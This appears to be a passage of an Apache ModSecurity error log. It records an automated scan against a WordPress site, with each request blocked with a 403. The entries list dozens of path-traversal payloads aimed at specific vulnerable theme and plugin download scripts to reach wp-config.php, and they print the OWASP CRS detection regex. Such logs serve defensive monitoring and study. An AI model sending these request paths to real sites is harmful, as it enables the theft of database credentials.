"OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippineartawards/download.php"] [unique_id "Y8DxJcPRCDYHCWWhHpAjvgAAABY"] [Fri Jan 13 00:50:30.020681 2023] [:error] [pid 31476:tid 140315247740672] [client 185.206.224.212:43164] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quies/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quies/download.php"] [unique_id "Y8DxJqGMrWzzUVMdEhcMFwAAAMo"] [Fri Jan 13 00:50:30.136070 2023] [:error] [pid 31476:tid 140315205777152] [client 185.206.224.212:43166] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salutation/framework/utilities/download/getfile.php"] [unique_id "Y8DxJqGMrWzzUVMdEhcMGAAAAM8"] [Fri Jan 13 00:50:30.273670 2023] [:error] [pid 31476:tid 140315163813632] [client 185.206.224.212:43168] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinitytheme/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinitytheme/lib/downloadlink.php"] [unique_id "Y8DxJqGMrWzzUVMdEhcMGQAAANQ"] [Fri Jan 13 00:50:30.391636 2023] [:error] [pid 31476:tid 140315289704192] [client 185.206.224.212:43170] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wohwiwebcenter-vdwbayern/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wohwiwebcenter-vdwbayern/download.php"] [unique_id "Y8DxJqGMrWzzUVMdEhcMGgAAAMU"] [Fri Jan 13 00:50:30.728657 2023] [:error] [pid 31042:tid 140315239347968] [client 185.206.224.212:43172] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zeebusiness/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zeebusiness/download.php"] [unique_id "Y8DxJo6vAq65Ygpdg5ObSwAAAEs"] [Fri Jan 13 00:50:30.843110 2023] [:error] [pid 31041:tid 140315188991744] [client 185.206.224.212:43174] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/maronpro/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/maronpro/download.php"] [unique_id "Y8DxJsPRCDYHCWWhHpAjvwAAABE"] [Fri Jan 13 00:50:30.969689 2023] [:error] [pid 31476:tid 140315405498112] [client 185.206.224.212:43176] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/DolarToday/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/DolarToday/down.php"] [unique_id "Y8DxJqGMrWzzUVMdEhcMGwAAAMA"] [Fri Jan 13 00:50:31.084520 2023] [:error] [pid 31476:tid 140315298096896] [client 185.206.224.212:43178] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MusicMaker/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MusicMaker/download.php"] [unique_id "Y8DxJ6GMrWzzUVMdEhcMHAAAAMQ"] [Fri Jan 13 00:50:31.199551 2023] [:error] [pid 31476:tid 140315147028224] [client 185.206.224.212:43180] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/green_farming_new/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/green_farming_new/download.php"] [unique_id "Y8DxJ6GMrWzzUVMdEhcMHQAAANY"] [Fri Jan 13 00:50:31.328711 2023] [:error] [pid 31476:tid 140315138635520] [client 185.206.224.212:43182] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "Y8DxJ6GMrWzzUVMdEhcMHgAAANc"] [Fri Jan 13 00:50:31.452155 2023] [:error] [pid 31476:tid 140315172206336] [client 185.206.224.212:43184] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "Y8DxJ6GMrWzzUVMdEhcMHwAAANM"] [Fri Jan 13 00:50:31.569317 2023] [:error] [pid 31476:tid 140315239347968] [client 185.206.224.212:43186] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php"] [unique_id "Y8DxJ6GMrWzzUVMdEhcMIAAAAMs"] [Fri Jan 13 00:50:31.684363 2023] [:error] [pid 31041:tid 140315172206336] [client 185.206.224.212:43188] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/RedSteel/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/RedSteel/download.php"] [unique_id "Y8DxJ8PRCDYHCWWhHpAjwAAAABM"] [Fri Jan 13 00:50:31.821211 2023] [:error] [pid 31041:tid 140315155420928] [client 185.206.224.212:43190] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:mp3 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mp3-jplayer/download.php"] [unique_id "Y8DxJ8PRCDYHCWWhHpAjwQAAABU"] [Fri Jan 13 00:50:31.936234 2023] [:error] [pid 31476:tid 140315197384448] [client 185.206.224.212:43192] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SCv1/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SCv1/download.php"] [unique_id "Y8DxJ6GMrWzzUVMdEhcMIQAAANA"] [Fri Jan 13 00:50:32.050623 2023] [:error] [pid 31476:tid 140315388712704] [client 185.206.224.212:43194] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adminonline/product/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adminonline/product/download.php"] [unique_id "Y8DxKKGMrWzzUVMdEhcMIgAAAMI"] [Fri Jan 13 00:50:32.167585 2023] [:error] [pid 31476:tid 140315397105408] [client 185.206.224.212:43196] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y8DxKKGMrWzzUVMdEhcMIwAAAME"] [Fri Jan 13 00:50:32.292839 2023] [:error] [pid 31476:tid 140315214169856] [client 185.206.224.212:43200] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/eshop-magic/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/eshop-magic/download.php"] [unique_id "Y8DxKKGMrWzzUVMdEhcMJAAAAM4"] [Fri Jan 13 00:50:32.407824 2023] [:error] [pid 31476:tid 140315230955264] [client 185.206.224.212:43202] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Y8DxKKGMrWzzUVMdEhcMJQAAAMw"] [Fri Jan 13 00:50:32.531158 2023] [:error] [pid 31041:tid 140315264526080] [client 185.206.224.212:43204] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/u_parts/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/u_parts/force-download.php"] [unique_id "Y8DxKMPRCDYHCWWhHpAjwgAAAAg"] [Fri Jan 13 00:50:32.645957 2023] [:error] [pid 31041:tid 140315214169856] [client 185.206.224.212:43206] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/nishizawa_tmp/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/nishizawa_tmp/force-download.php"] [unique_id "Y8DxKMPRCDYHCWWhHpAjwwAAAA4"] [Fri Jan 13 00:50:32.765151 2023] [:error] [pid 31043:tid 140315256133376] [client 185.206.224.212:43208] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cafesalivation/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cafesalivation/download.php"] [unique_id "Y8DxKMx9A9c0KkSpLadQKAAAAIk"] [Fri Jan 13 00:50:32.899047 2023] [:error] [pid 31043:tid 140315180599040] [client 185.206.224.212:43210] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: 